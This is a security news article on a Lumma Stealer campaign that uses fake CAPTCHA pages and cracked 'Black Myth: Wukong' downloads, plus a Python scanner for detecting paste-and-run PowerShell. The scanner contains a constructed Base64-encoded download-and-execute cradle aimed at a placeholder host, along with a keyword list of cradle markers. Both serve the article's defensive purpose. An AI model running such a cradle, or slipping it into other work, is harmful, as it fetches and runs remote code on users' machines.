A pirated version of the “Black Myth: Wukong” video game is used by cybercriminals to spread the Lumma Stealer malware. Attackers are using fake CAPTCHA pages to distribute the malware, deceiving users into executing malicious scripts under the guise of verifying they are not bots. This ongoing operation targets users globally, with phishing emails and counterfeit game download sites acting as key infection vectors.
Cracked ‘Black Myth: Wukong’ promises
McAfee's report details how users seeking free or cracked versions of popular games such as Black Myth: Wukong or Dying Light 2 are being redirected to malicious CAPTCHA pages. These pages use social engineering tricks, prompting users to click on “I'm not a robot” buttons.
Once clicked, a Base64-encoded PowerShell script is copied to the clipboard, and users are instructed to run it manually, unknowingly triggering the malware installation. The scripts are designed to download and install Lumma Stealer, a well-known information-stealing malware capable of exfiltrating passwords, browser data, cryptocurrency wallets, and more.
The infection chain begins with users searching online for cracked versions of popular games. Public forums and repositories, including sites hosted on Runkit and GitHub, lure users with promises of free downloads. Upon clicking on download links, users are funneled through redirections to the fake CAPTCHA pages, where the attack unfolds.
The campaign also targets GitHub users via phishing emails, impersonating the platform's security team and warning recipients of a fabricated vulnerability. Once recipients click the provided link, they are directed to the same malicious CAPTCHA system.
Lumma Stealer is dropped onto the infected system through an obfuscated and encrypted script, making detection difficult. The script, when executed, downloads additional payloads from remote servers, often storing them in the Temp folder to evade scrutiny. This multi-layered encryption and use of legitimate tools like PowerShell further complicates efforts to identify and block the attack.
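The clipboard-to-PowerShell step described above leaves a recognisable trace in process-creation telemetry: PowerShell launched from the interactive shell (the Run dialog is a child of explorer.exe) with a Base64-encoded command that, once decoded, contains a download-and-execute cradle. The following Python scanner is an added example written for this article; it is not code from McAfee's report or from the campaign. It assumes a simplified, constructed key=value rendering of process-creation events (the field names mirror Sysmon's ParentImage/Image/CommandLine, but the line format itself is invented for the example), and the encoded command it decodes is built inline and points at a reserved .invalid domain.

```python
import base64
import re

# Constructed sample command, encoded the way PowerShell's -EncodedCommand expects
# (UTF-16LE, then Base64). It targets a reserved .invalid host and is not a real
# campaign artifact; it exists only so the scanner has something to decode.
SAMPLE_CMD = (
    "$u='http://example.invalid/p.txt';"
    "iex (New-Object Net.WebClient).DownloadString($u)"
)
SAMPLE_ENC = base64.b64encode(SAMPLE_CMD.encode("utf-16-le")).decode()

# Constructed process-creation events in a simplified key=value|key=value layout.
# Event 0 models the fake-CAPTCHA pattern (explorer.exe -> powershell.exe -enc ...);
# events 1 and 2 are benign controls.
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    f"|CommandLine=powershell.exe -w hidden -enc {SAMPLE_ENC}",
    "ParentImage=C:\\Windows\\System32\\cmd.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -File C:\\scripts\\backup.ps1",
    "ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\notepad.exe"
    "|CommandLine=notepad.exe notes.txt",
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match "-e<letters>" and check that the letters are a prefix of the full name.
ENC_FLAG = re.compile(r"-([eE][A-Za-z]*)\s+([A-Za-z0-9+/=]{16,})")

# Substrings that commonly appear in download-and-execute cradles and in
# payload staging under the user's Temp folder.
CRADLE_MARKERS = (
    "downloadstring", "downloadfile", "invoke-webrequest", "iwr",
    "invoke-expression", "iex", "net.webclient", "$env:temp", "\\temp\\",
)

# Parents that indicate a human typed or pasted the command (Run dialog, desktop).
INTERACTIVE_PARENTS = ("explorer.exe",)


def parse_event(line):
    """Split one constructed key=value|key=value line into a dict."""
    return dict(kv.split("=", 1) for kv in line.split("|"))


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    for m in ENC_FLAG.finditer(cmdline):
        if not "encodedcommand".startswith(m.group(1).lower()):
            continue  # e.g. -ep / -ExecutionPolicy, not an encoded command
        try:
            return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def assess_event(line):
    """Score one event; 'suspicious' needs at least two independent reasons."""
    ev = parse_event(line)
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    result = {"suspicious": False, "reasons": [], "decoded": None, "markers": []}
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return result
    if parent.endswith(INTERACTIVE_PARENTS):
        result["reasons"].append("powershell spawned from interactive shell (Run dialog pattern)")
    decoded = decode_encoded_command(ev.get("CommandLine", ""))
    if decoded is not None:
        result["decoded"] = decoded
        result["reasons"].append("base64 -EncodedCommand present and decoded")
        result["markers"] = [k for k in CRADLE_MARKERS if k in decoded.lower()]
        if result["markers"]:
            result["reasons"].append("download/exec markers in decoded command")
    result["suspicious"] = len(result["reasons"]) >= 2
    return result


def scan(lines):
    """Return the indices of events that should be raised as alerts."""
    return [i for i, line in enumerate(lines) if assess_event(line)["suspicious"]]


if __name__ == "__main__":
    for i in scan(SAMPLE_EVENTS):
        r = assess_event(SAMPLE_EVENTS[i])
        print(f"event {i}: {'; '.join(r['reasons'])}")
        print(f"  decoded: {r['decoded']}")
```

The two-reason threshold matters: an encoded command on its own is common in legitimate automation, and PowerShell under explorer.exe is common for administrators, but the combination with a decoded download cradle is what distinguishes the paste-and-run pattern. In a real deployment the decoded text, not just the raw command line, is what should be indexed, because the Base64 layer otherwise hides every marker from keyword searches.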
Key measures to minimize the likelihood of info-stealer malware infections include:
- Do not download cracked software from unauthorized sources, and steer clear of suspicious websites.
- Beware of phishing scams and fake CAPTCHA prompts.
- Regularly update antivirus software so that it can detect and block malware at multiple stages of the infection chain.
- Enable email filtering to intercept phishing attempts.
- Restrict clipboard-based scripts and disable automatic execution of scripts on systems.
The immense popularity of “Black Myth: Wukong” has made it a prime target for cybercriminals seeking to exploit its high-profile release. During the game's launch in August 2024, Steam was hit by a massive DDoS attack orchestrated by the AISURU botnet, which crippled the platform for millions of users worldwide. The game's popularity and already massive user base provide cybercriminals with ample opportunity to launch a plethora of attacks.